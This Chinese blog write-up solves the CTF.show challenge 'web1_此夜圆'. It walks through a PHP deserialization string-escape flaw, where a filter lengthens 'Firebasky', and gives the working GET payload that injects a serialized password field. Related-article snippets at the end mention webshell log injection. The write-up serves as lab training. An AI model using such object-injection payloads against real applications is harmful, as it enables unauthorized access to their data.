CTF.show:web1_此夜圆

最新推荐文章于 2024-02-22 14:19:14 发布
最新推荐文章于 2024-02-22 14:19:14 发布
阅读量533 收藏 1
点赞数 1
分类专栏: CTF.show CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113666308
版权

先看一下源码

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

看题目是构造一个反序列化逃逸。
因为str_replace('Firebasky','Firebaskyup',$string);的存在,传入Firebasky后会多两个字符。

在这里插入图片描述
因为我们要逃逸的是这串字符s:8:"password";s:5:"yu22x";}
因为我们只能读入一个uname,而原来的password默认为1,试着构造
在这里插入图片描述

O:1:"a":2:{s:5:"uname";s:39:"Firebasky";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}

我们这句话里,要覆盖掉原来的password,需要";s:8:"password";s:5:"yu22x";}利用这句话,一共有30位,而每个str_replace多两位,所以一共需要用15个Firebasky来构造逃逸。因此,构造payload

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

得到flag
在这里插入图片描述

FW_ENJOEY
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.rip:CTF.RIP Jekyll静态网站
04-04
此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_...
ctfshow web 月饼杯
m0_62422842的博客
06-10 492
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
ctfshow web篇月饼杯
读书 买花 长大
01-05 304
月饼杯
Web1_此夜
qq_43774856的博客
11-30 266
Web1_此夜 下载附件,得到源码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pass
ctfshow月饼杯 web wp
Firebasky的博客
09-27 1227
这次的这个比赛中的web是我和羽师傅还有m3w师傅一起出的,一人一道。 其中最喜欢的是web3 羽师傅出的,真的太有意思啦。感谢羽师傅呢。 还有web1让自己复习序列化知识,感谢m3w师傅呢 web1_此夜 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname;.
ctf.lib:somectf文件
04-09
标题中的“ctf.lib:somectf文件”可能指的是某个CTF赛事中使用的库或者工具,具体到这个例子中,可能是参赛者或者组织者用于比赛的一份资源库,名为“ctf.lib”,其中包含了某个特定的CTF挑战,可能是安全漏洞的模拟...
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
【ctfshow—web】——信息搜集篇1(web1~20详解)
最新发布
练习时长两年半的CTF爱好者
02-22 2204
此题为 【从0开始学web】系列第二十题 此系列题目从最基础开始,题目遵循循序渐进的原则 希望对学习CTF WEB的同学有所帮助。
CtfShow-web-1~7
qq_43036356的博客
11-02 195
这里读取当前环境的日志文件,读取成功,那么可以使用日志注入webshell。这里是登录,不能使用order by进行探测。根据提示源码,需要输入两个参数,v1,v2。执行了ls命令之后,我们可以看到出现了两个文件。第一关很简单,启动环境,进入连接后,页面问,flag在哪里,直接按F12查看源码。已经发现过滤,和已经成功绕过,后面的就好办了,重复写sql就行了。BP抓包,在UA头写入webshell一句话木马。这一关依旧是文件读取,但是发现伪协议不行了。但经过fuzz发现,过滤了空格和()。
CTFshow web1
羽的博客
02-26 6027
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
CTFshow刷题记录
bmth666的博客
01-13 2641
文章目录web_月饼杯web1_此夜web2_故人心web3_莫负婵娟WEB入门web55红包题第二弹web57 web_月饼杯 最近在ctfshow上看到了不少好题,来学一学,做一做 web1_此夜 题目直接给出了源码: <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname
ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)
wangyuxiang946的博客
09-08 1万+
ctf.show 萌新模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
ctfshow-WEB-web1签到题
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
CTFShow:萌新web1
weixin_64089259的博客
04-14 908
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow-月饼杯WP
~airrudder~
09-27 4410
源码文件Baby(Don't)Cry.py: # -*- coding:utf-8 -*- #Author: Lazzaro from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个字符串,使得它的md5值以0e开头,然后将这个字符串作为v1和v2的值传递即可。在PHP中,当字符串以0e开头并且后面跟着一串数字时,PHP会将这个字符串解析成科学计数法的形式,因此可以绕过is_numeric()函数的检测。而ctype_alpha()函数只检测字符串中是否仅包含字母,不会对字符串进行其他处理,因此不会受到0e漏洞的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值